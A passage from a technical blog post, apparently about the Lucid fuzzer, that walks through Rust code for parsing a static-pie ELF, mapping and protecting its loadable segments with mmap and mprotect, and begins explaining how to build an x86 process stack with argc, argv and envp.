    <span class="k">pub</span> <span class="n">shoff</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">phentsize</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">phnum</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">shentsize</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">shnum</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">shrstrndx</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We really only care about a few of these struct members. For one, we definitely need to know the <code class="language-plaintext highlighter-rouge">entry</code>, which is where you’re supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about <code class="language-plaintext highlighter-rouge">phoff</code>. This is the offset into the ELF where we can find the base of the Program Header table, which is basically just an array of Program Headers. Along with <code class="language-plaintext highlighter-rouge">phoff</code>, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where <code class="language-plaintext highlighter-rouge">phnum</code> and <code class="language-plaintext highlighter-rouge">phentsize</code> come in handy, respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.</p>
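<p>To make that concrete, here is a minimal sketch of pulling just those fields out of a 64-bit little-endian ELF header. This is not the actual Lucid parser: <code class="language-plaintext highlighter-rouge">parse_elf_header</code>, <code class="language-plaintext highlighter-rouge">ph_offset</code>, and the read helpers are hypothetical names, and the struct is trimmed to the members discussed above. The byte offsets are the standard ELF64 header offsets.</p>

```rust
// Sketch only: trimmed-down header with hypothetical helper names.
#[derive(Debug, PartialEq)]
pub struct ElfHeader {
    pub entry: u64,
    pub phoff: u64,
    pub phentsize: u16,
    pub phnum: u16,
}

// Read a little-endian u64 at `off`, or None if the buffer is too short
fn read_u64(data: &[u8], off: usize) -> Option<u64> {
    let mut buf = [0u8; 8];
    buf.copy_from_slice(data.get(off..off.checked_add(8)?)?);
    Some(u64::from_le_bytes(buf))
}

// Read a little-endian u16 at `off`, or None if the buffer is too short
fn read_u16(data: &[u8], off: usize) -> Option<u16> {
    let mut buf = [0u8; 2];
    buf.copy_from_slice(data.get(off..off.checked_add(2)?)?);
    Some(u16::from_le_bytes(buf))
}

pub fn parse_elf_header(data: &[u8]) -> Option<ElfHeader> {
    // Magic bytes, then EI_CLASS == 2 (64-bit) and EI_DATA == 1 (little-endian)
    if !data.starts_with(b"\x7fELF") || *data.get(4)? != 2 || *data.get(5)? != 1 {
        return None;
    }

    Some(ElfHeader {
        entry: read_u64(data, 0x18)?,     // e_entry
        phoff: read_u64(data, 0x20)?,     // e_phoff
        phentsize: read_u16(data, 0x36)?, // e_phentsize
        phnum: read_u16(data, 0x38)?,     // e_phnum
    })
}

// File offset of Program Header `idx`: base of the table plus idx entries
pub fn ph_offset(hdr: &ElfHeader, idx: u16) -> Option<u64> {
    if idx >= hdr.phnum {
        return None;
    }
    hdr.phoff.checked_add(idx as u64 * hdr.phentsize as u64)
}
```

<p>With the values from our <code class="language-plaintext highlighter-rouge">test</code> binary (12 entries of 56 bytes each), walking the table is just calling <code class="language-plaintext highlighter-rouge">ph_offset</code> for every index below <code class="language-plaintext highlighter-rouge">phnum</code> and parsing 56 bytes at each offset.</p>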

<p>A single program header, i.e., a single entry in the array, can be synthesized into the following data structure:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[derive(Debug)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">ProgramHeader</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">typ</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">flags</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">offset</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">vaddr</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">paddr</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">filesz</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">memsz</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">align</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span> 
<span class="p">}</span>
</code></pre></div></div>

<p>These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type <code class="language-plaintext highlighter-rouge">LOAD</code>, as these segments are the ones we have to account for when loading the ELF image. Take our <code class="language-plaintext highlighter-rouge">readelf</code> output for example:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
</span></code></pre></div></div>

<p>We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">Flags</code> describes the memory permissions this segment should have, we have 3 distinct memory protection schemes <code class="language-plaintext highlighter-rouge">READ</code>, <code class="language-plaintext highlighter-rouge">READ | EXECUTE</code>, and <code class="language-plaintext highlighter-rouge">READ | WRITE</code></li>
  <li><code class="language-plaintext highlighter-rouge">Offset</code> describes how far into the physical file contents we can expect to find this segment</li>
  <li><code class="language-plaintext highlighter-rouge">PhysAddr</code> we don’t much care about</li>
  <li><code class="language-plaintext highlighter-rouge">VirtAddr</code> the virtual address this segment should be loaded at, you can tell that the first segment value for this is <code class="language-plaintext highlighter-rouge">0x0000000000000000</code> which means that it has no expectations about where it’s to be loaded.</li>
  <li><code class="language-plaintext highlighter-rouge">MemSiz</code> how large the segment should be in virtual memory</li>
  <li><code class="language-plaintext highlighter-rouge">FileSiz</code> how many bytes of the segment are actually stored in the file; when this is smaller than <code class="language-plaintext highlighter-rouge">MemSiz</code>, as it is for the last segment, the remainder is zero-filled memory</li>
  <li><code class="language-plaintext highlighter-rouge">Align</code> how to align the segments in virtual memory</li>
</ul>
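<p>As a rough illustration of how those attributes fall out of the raw bytes, here is a sketch that parses one 56-byte Program Header entry and decodes its type and flags. The method names (<code class="language-plaintext highlighter-rouge">parse</code>, <code class="language-plaintext highlighter-rouge">perms</code>) and the constants are my own for this example and are not necessarily what Lucid uses; the field offsets and the <code class="language-plaintext highlighter-rouge">PT_LOAD</code>/<code class="language-plaintext highlighter-rouge">PF_*</code> values are the standard ELF64 ones.</p>

```rust
// Standard ELF constants; the names of the Rust items are assumptions
pub const PT_LOAD: u32 = 1;
pub const PF_X: u32 = 0x1;
pub const PF_W: u32 = 0x2;
pub const PF_R: u32 = 0x4;
pub const PHDR_SIZE: usize = 56;

#[derive(Debug)]
pub struct ProgramHeader {
    pub typ: u32,
    pub flags: u32,
    pub offset: u64,
    pub vaddr: u64,
    pub filesz: u64,
    pub memsz: u64,
    pub align: u64,
}

impl ProgramHeader {
    // Parse a single little-endian Elf64_Phdr; paddr (offset 24) is skipped
    // because we don't use it
    pub fn parse(entry: &[u8]) -> Option<ProgramHeader> {
        if entry.len() < PHDR_SIZE {
            return None;
        }

        let u32_at = |off: usize| {
            let mut b = [0u8; 4];
            b.copy_from_slice(&entry[off..off + 4]);
            u32::from_le_bytes(b)
        };
        let u64_at = |off: usize| {
            let mut b = [0u8; 8];
            b.copy_from_slice(&entry[off..off + 8]);
            u64::from_le_bytes(b)
        };

        Some(ProgramHeader {
            typ: u32_at(0),
            flags: u32_at(4),
            offset: u64_at(8),
            vaddr: u64_at(16),
            filesz: u64_at(32),
            memsz: u64_at(40),
            align: u64_at(48),
        })
    }

    // Only segments of type LOAD need to be placed in memory
    pub fn is_load(&self) -> bool {
        self.typ == PT_LOAD
    }

    // Render the flags the way `readelf` does, e.g. "R E" or "RW "
    pub fn perms(&self) -> String {
        let mut s = String::new();
        s.push(if self.flags & PF_R != 0 { 'R' } else { ' ' });
        s.push(if self.flags & PF_W != 0 { 'W' } else { ' ' });
        s.push(if self.flags & PF_X != 0 { 'E' } else { ' ' });
        s
    }
}
```

<p>Feeding it the fourth <code class="language-plaintext highlighter-rouge">LOAD</code> entry from the <code class="language-plaintext highlighter-rouge">readelf</code> output would give a <code class="language-plaintext highlighter-rouge">vaddr</code> of <code class="language-plaintext highlighter-rouge">0xc7de0</code>, permissions of <code class="language-plaintext highlighter-rouge">RW</code>, and a <code class="language-plaintext highlighter-rouge">memsz</code> that is larger than <code class="language-plaintext highlighter-rouge">filesz</code>.</p>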

<p>For our very simplistic use-case of only loading a <code class="language-plaintext highlighter-rouge">-static-pie</code> ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.</p>

<h2 id="loading-the-elf">Loading the ELF</h2>
<p>Now that we’ve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I’ve chosen to only implement what’s needed in a Linux environment, but there’s no reason why we couldn’t load this ELF into our memory if we happened to be a Windows userland process. That’s kind of why this whole design is cool. At some point, maybe someone will want Windows support and we’ll add it.</p>

<p>The first thing we need to do is calculate the size of the virtual memory that we need in order to load the ELF, based on how far the segments that are marked <code class="language-plaintext highlighter-rouge">LOAD</code> extend in memory. We also have to keep in mind that there is some padding after the segments that don’t end on a page boundary, so to do this, I used the following logic:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Read the executable file into memory</span>
<span class="k">let</span> <span class="n">data</span> <span class="o">=</span> <span class="nf">read</span><span class="p">(</span><span class="n">BOCHS_IMAGE</span><span class="p">)</span><span class="nf">.map_err</span><span class="p">(|</span><span class="n">_</span><span class="p">|</span> <span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span>
    <span class="s">"Unable to read binary data from Bochs binary"</span><span class="p">))</span><span class="o">?</span><span class="p">;</span>

<span class="c1">// Parse ELF </span>
<span class="k">let</span> <span class="n">elf</span> <span class="o">=</span> <span class="nf">parse_elf</span><span class="p">(</span><span class="o">&amp;</span><span class="n">data</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>

<span class="c1">// We need to iterate through all of the loadable program headers and </span>
<span class="c1">// determine the size of the address range we need</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">mapping_size</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="n">ph</span> <span class="k">in</span> <span class="n">elf</span><span class="py">.program_headers</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">ph</span><span class="nf">.is_load</span><span class="p">()</span> <span class="p">{</span>
        <span class="k">let</span> <span class="n">end_addr</span> <span class="o">=</span> <span class="p">(</span><span class="n">ph</span><span class="py">.vaddr</span> <span class="o">+</span> <span class="n">ph</span><span class="py">.memsz</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">;</span>
        <span class="k">if</span> <span class="n">mapping_size</span> <span class="o">&lt;</span> <span class="n">end_addr</span> <span class="p">{</span> <span class="n">mapping_size</span> <span class="o">=</span> <span class="n">end_addr</span><span class="p">;</span> <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Round the mapping up to a page</span>
<span class="k">if</span> <span class="n">mapping_size</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>
    <span class="n">mapping_size</span> <span class="o">+=</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="p">(</span><span class="n">mapping_size</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
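<p>To sanity check that logic, here is the same calculation as a small standalone function run against the four <code class="language-plaintext highlighter-rouge">LOAD</code> segments from the <code class="language-plaintext highlighter-rouge">readelf</code> output. The function name and the <code class="language-plaintext highlighter-rouge">(vaddr, memsz)</code> tuple shape are just assumptions for this sketch, as is the <code class="language-plaintext highlighter-rouge">0x1000</code> page size.</p>

```rust
// Assumed page size for this sketch
const PAGE_SIZE: usize = 0x1000;

// Given (vaddr, memsz) pairs for the LOAD segments, return the size of the
// contiguous mapping needed to hold them, rounded up to a whole page
pub fn mapping_size(segments: &[(usize, usize)]) -> usize {
    // The highest end address wins, which also covers any gaps between
    // segments
    let end = segments
        .iter()
        .map(|&(vaddr, memsz)| vaddr + memsz)
        .max()
        .unwrap_or(0);

    // Round up to the next page boundary
    (end + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}

// The LOAD segments from the `readelf` output as (VirtAddr, MemSiz)
pub const TEST_SEGMENTS: [(usize, usize); 4] = [
    (0x0, 0x8158),
    (0x9000, 0x94d01),
    (0x9e000, 0x285e0),
    (0xc7de0, 0x6a80),
];
```

<p>For our binary the last segment ends at <code class="language-plaintext highlighter-rouge">0xc7de0 + 0x6a80 = 0xce860</code>, so <code class="language-plaintext highlighter-rouge">mapping_size(&amp;TEST_SEGMENTS)</code> comes out to <code class="language-plaintext highlighter-rouge">0xcf000</code> bytes.</p>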

<p>We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest “<code class="language-plaintext highlighter-rouge">end_addr</code>” is. Because this is the highest address any segment reaches, it also accounts for the page-aligning padding in between segments. And as you can see, we page-align the end of the last segment too by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to <code class="language-plaintext highlighter-rouge">mmap</code> to hold the loadable ELF segments. We <code class="language-plaintext highlighter-rouge">mmap</code> a contiguous range of memory here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Call `mmap` to map memory into our process to hold all of the loadable </span>
<span class="c1">// program header contents in a contiguous range. Right now the perms will be</span>
<span class="c1">// generic across the entire range as PROT_WRITE,</span>
<span class="c1">// later we'll go back and `mprotect` them appropriately</span>
<span class="k">fn</span> <span class="nf">initial_mmap</span><span class="p">(</span><span class="n">size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">usize</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="c1">// We don't pass `MAP_FIXED`, so `LOAD_TARGET` is only a placement hint</span>
    <span class="k">let</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">LOAD_TARGET</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span><span class="p">;</span>

    <span class="c1">// Length is straight forward</span>
    <span class="k">let</span> <span class="n">length</span> <span class="o">=</span> <span class="n">size</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">size_t</span><span class="p">;</span>

    <span class="c1">// Set the protections for now to writable</span>
    <span class="k">let</span> <span class="n">prot</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span><span class="p">;</span>

    <span class="c1">// Set the flags, this is anonymous memory</span>
    <span class="k">let</span> <span class="n">flags</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_ANONYMOUS</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_PRIVATE</span><span class="p">;</span>

    <span class="c1">// We don't have a file to map, so this is -1</span>
    <span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>

    <span class="c1">// We don't specify an offset </span>
    <span class="k">let</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">off_t</span><span class="p">;</span>

    <span class="c1">// Call `mmap` and make sure it succeeds</span>
    <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nn">libc</span><span class="p">::</span><span class="nf">mmap</span><span class="p">(</span>
            <span class="n">addr</span><span class="p">,</span>
            <span class="n">length</span><span class="p">,</span>
            <span class="n">prot</span><span class="p">,</span>
            <span class="n">flags</span><span class="p">,</span>
            <span class="n">fd</span><span class="p">,</span>
            <span class="n">offset</span>
        <span class="p">)</span>
    <span class="p">};</span>

    <span class="k">if</span> <span class="n">result</span> <span class="o">==</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_FAILED</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Failed to `mmap` memory for Bochs"</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="nf">Ok</span><span class="p">(</span><span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a <code class="language-plaintext highlighter-rouge">memcpy</code> from the file data in memory, to the carved out memory we just created. You can see that logic here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="k">mut</span> <span class="n">load_segments</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="n">ph</span> <span class="k">in</span> <span class="n">elf</span><span class="py">.program_headers</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">ph</span><span class="nf">.is_load</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">load_segments</span><span class="nf">.push</span><span class="p">((</span>
            <span class="n">ph</span><span class="py">.flags</span><span class="p">,</span>               <span class="c1">// segment.0</span>
            <span class="n">ph</span><span class="py">.vaddr</span>    <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>   <span class="c1">// segment.1</span>
            <span class="n">ph</span><span class="py">.memsz</span>    <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>   <span class="c1">// segment.2</span>
            <span class="n">ph</span><span class="py">.offset</span>   <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>   <span class="c1">// segment.3</span>
            <span class="n">ph</span><span class="py">.filesz</span>   <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>   <span class="c1">// segment.4</span>
        <span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After the segment metadata has been extracted, we can copy the contents over as well as call <code class="language-plaintext highlighter-rouge">mprotect</code> on the segment in memory so that its permissions perfectly match the <code class="language-plaintext highlighter-rouge">Flags</code> segment metadata we discussed earlier. That logic is here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Iterate through the loadable segments and change their perms and then </span>
<span class="c1">// then change the perms to match the segment flags</span>
<span class="k">for</span> <span class="n">segment</span> <span class="k">in</span> <span class="n">load_segments</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// Copy the binary data over, the destination is where in our process</span>
    <span class="c1">// memory we're copying the binary data to. The source is where we copy</span>
    <span class="c1">// from, this is going to be an offset into the binary data in the file,</span>
    <span class="c1">// len is going to be how much binary data is in the file, that's filesz </span>
    <span class="c1">// This is going to be unsafe no matter what</span>
    <span class="k">let</span> <span class="n">len</span> <span class="o">=</span> <span class="n">segment</span><span class="na">.4</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">dst</span> <span class="o">=</span> <span class="p">(</span><span class="n">addr</span> <span class="o">+</span> <span class="n">segment</span><span class="na">.1</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">src</span> <span class="o">=</span> <span class="p">(</span><span class="n">elf</span><span class="py">.data</span><span class="p">[</span><span class="n">segment</span><span class="na">.3</span><span class="o">..</span><span class="n">segment</span><span class="na">.3</span> <span class="o">+</span> <span class="n">len</span><span class="p">])</span><span class="nf">.as_ptr</span><span class="p">();</span>

    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">copy_nonoverlapping</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Calculate the `mprotect` address by adding the mmap address plus the</span>
    <span class="c1">// virtual address offset, we also mask off the low 12 bits (the offset </span>
    <span class="c1">// within the page) so that we are always page-aligned as required by `mprotect`</span>
    <span class="k">let</span> <span class="n">mprotect_addr</span> <span class="o">=</span> <span class="p">((</span><span class="n">addr</span> <span class="o">+</span> <span class="n">segment</span><span class="na">.1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">!</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span>
        <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span><span class="p">;</span>

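    <span class="c1">// Get the length, adding back the bytes we skipped by rounding the</span>
    <span class="c1">// address down so that the segment's last page is covered as well</span>
    <span class="k">let</span> <span class="n">mprotect_len</span> <span class="o">=</span> <span class="p">(</span><span class="n">segment</span><span class="na">.2</span> <span class="o">+</span> <span class="p">(</span><span class="n">segment</span><span class="na">.1</span> <span class="o">&amp;</span> <span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)))</span>
        <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">size_t</span><span class="p">;</span>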

    <span class="c1">// Get the protection</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">mprotect_prot</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>
    <span class="k">if</span> <span class="n">segment</span><span class="na">.0</span> <span class="o">&amp;</span> <span class="mi">0x1</span> <span class="o">==</span> <span class="mi">0x1</span> <span class="p">{</span> <span class="n">mprotect_prot</span> <span class="p">|</span><span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_EXEC</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">if</span> <span class="n">segment</span><span class="na">.0</span> <span class="o">&amp;</span> <span class="mi">0x2</span> <span class="o">==</span> <span class="mi">0x2</span> <span class="p">{</span> <span class="n">mprotect_prot</span> <span class="p">|</span><span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">if</span> <span class="n">segment</span><span class="na">.0</span> <span class="o">&amp;</span> <span class="mi">0x4</span> <span class="o">==</span> <span class="mi">0x4</span> <span class="p">{</span> <span class="n">mprotect_prot</span> <span class="p">|</span><span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_READ</span><span class="p">;</span> <span class="p">}</span>

    <span class="c1">// Call `mprotect` to change the mapping perms</span>
    <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nn">libc</span><span class="p">::</span><span class="nf">mprotect</span><span class="p">(</span>
            <span class="n">mprotect_addr</span><span class="p">,</span>
            <span class="n">mprotect_len</span><span class="p">,</span>
            <span class="n">mprotect_prot</span>
        <span class="p">)</span>
    <span class="p">};</span>

    <span class="k">if</span> <span class="n">result</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Failed to `mprotect` memory for Bochs"</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
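<p><code class="language-plaintext highlighter-rouge">mprotect</code> works on whole pages, so the range we hand it has to start on a page boundary and reach the end of the last page the segment touches. Here is a minimal sketch of just that arithmetic plus the flag translation, with no system calls involved. <code class="language-plaintext highlighter-rouge">elf_flags_to_prot</code> and <code class="language-plaintext highlighter-rouge">protect_range</code> are hypothetical helpers, and the <code class="language-plaintext highlighter-rouge">PROT_*</code> values are hard-coded to their Linux values so the example doesn’t need the <code class="language-plaintext highlighter-rouge">libc</code> crate.</p>

```rust
// Assumed page size for this sketch
const PAGE_SIZE: usize = 0x1000;

// Linux values for the protection bits (assumption: we are on Linux)
pub const PROT_READ: i32 = 0x1;
pub const PROT_WRITE: i32 = 0x2;
pub const PROT_EXEC: i32 = 0x4;

// Translate ELF segment flags (PF_X = 1, PF_W = 2, PF_R = 4) into the
// protection bits expected by `mprotect`
pub fn elf_flags_to_prot(flags: u32) -> i32 {
    let mut prot = 0;
    if flags & 0x1 != 0 { prot |= PROT_EXEC; }
    if flags & 0x2 != 0 { prot |= PROT_WRITE; }
    if flags & 0x4 != 0 { prot |= PROT_READ; }
    prot
}

// Compute the page-aligned (start, length) that covers a segment loaded at
// `base + vaddr` and spanning `memsz` bytes
pub fn protect_range(base: usize, vaddr: usize, memsz: usize) -> (usize, usize) {
    // Round the start down to a page boundary
    let start = (base + vaddr) & !(PAGE_SIZE - 1);

    // Round the end up to a page boundary
    let end = (base + vaddr + memsz + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);

    (start, end - start)
}
```

<p>For the <code class="language-plaintext highlighter-rouge">RW</code> segment at <code class="language-plaintext highlighter-rouge">0xc7de0</code> with a <code class="language-plaintext highlighter-rouge">MemSiz</code> of <code class="language-plaintext highlighter-rouge">0x6a80</code>, this yields a start of <code class="language-plaintext highlighter-rouge">base + 0xc7000</code> and a length of <code class="language-plaintext highlighter-rouge">0x8000</code>, which covers everything up to <code class="language-plaintext highlighter-rouge">base + 0xcf000</code>.</p>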

<p>After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we first have to set up a stack for the new “process”, which I learned was a huge pain.</p>

<h2 id="setting-up-a-stack-for-bochs">Setting Up a Stack for Bochs</h2>
<p>I spent a lot of time on this and there actually might still be bugs! This was the hardest part I’d say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: <a href="https://articles.manugarg.com/aboutelfauxiliaryvectors">https://articles.manugarg.com/aboutelfauxiliaryvectors</a>.</p>

<p>Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>position            content                     size (bytes) + comment
  ------------------------------------------------------------------------
  stack pointer -&gt;  [ argc = number of args ]     4
                    [ argv[0] (pointer) ]         4   (program name)
                    [ argv[1] (pointer) ]         4
                    [ argv[..] (pointer) ]        4 * x
                    [ argv[n - 1] (pointer) ]     4
                    [ argv[n] (pointer) ]         4   (= NULL)

                    [ envp[0] (pointer) ]         4
                    [ envp[1] (pointer) ]         4
                    [ envp[..] (pointer) ]        4
                    [ envp[term] (pointer) ]      4   (= NULL)

                    [ auxv[0] (Elf32_auxv_t) ]    8
                    [ auxv[1] (Elf32_auxv_t) ]    8
                    [ auxv[..] (Elf32_auxv_t) ]   8
                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                    [ padding ]                   0 - 16

                    [ argument ASCIIZ strings ]   &gt;= 0
                    [ environment ASCIIZ str. ]   &gt;= 0

  (0xbffffffc)      [ end marker ]                4   (= NULL)

  (0xc0000000)      &lt; bottom of stack &gt;           0   (virtual)
  ------------------------------------------------------------------------
</code></pre></div></div>

<p>When we pass arguments to a process on the command line like <code class="language-plaintext highlighter-rouge">ls / -laht</code>, the Linux OS has to load the <code class="language-plaintext highlighter-rouge">ls</code> ELF into memory and create its environment. In this example, we passed a couple of argument values to the process as well: <code class="language-plaintext highlighter-rouge">/</code> and <code class="language-plaintext highlighter-rouge">-laht</code>. The way that the OS passes these arguments to the process is on the stack via the argument vector or <code class="language-plaintext highlighter-rouge">argv</code> for short, which is an array of string pointers. The number of arguments is represented by the argument count or <code class="language-plaintext highlighter-rouge">argc</code>. The first member of <code class="language-plaintext highlighter-rouge">argv</code> is usually the name of the executable that was passed on the command line, so in our example it would be <code class="language-plaintext highlighter-rouge">ls</code>. As you can see, the first thing on the stack (the top of the stack, which is at the lower end of the stack’s address range) is <code class="language-plaintext highlighter-rouge">argc</code>, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is <code class="language-plaintext highlighter-rouge">NULL</code> terminated.</p>

<p>After that, we have a similar data structure with the <code class="language-plaintext highlighter-rouge">envp</code> array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command <code class="language-plaintext highlighter-rouge">show environment</code>. The environment variables are usually in the form “KEY=VALUE”, for instance on my machine the key-value pair for the language environment variable is <code class="language-plaintext highlighter-rouge">"LANG=en_US.UTF-8"</code>. For our purposes, we can ignore the environment variables. This vector is also <code class="language-plaintext highlighter-rouge">NULL</code> terminated.</p>
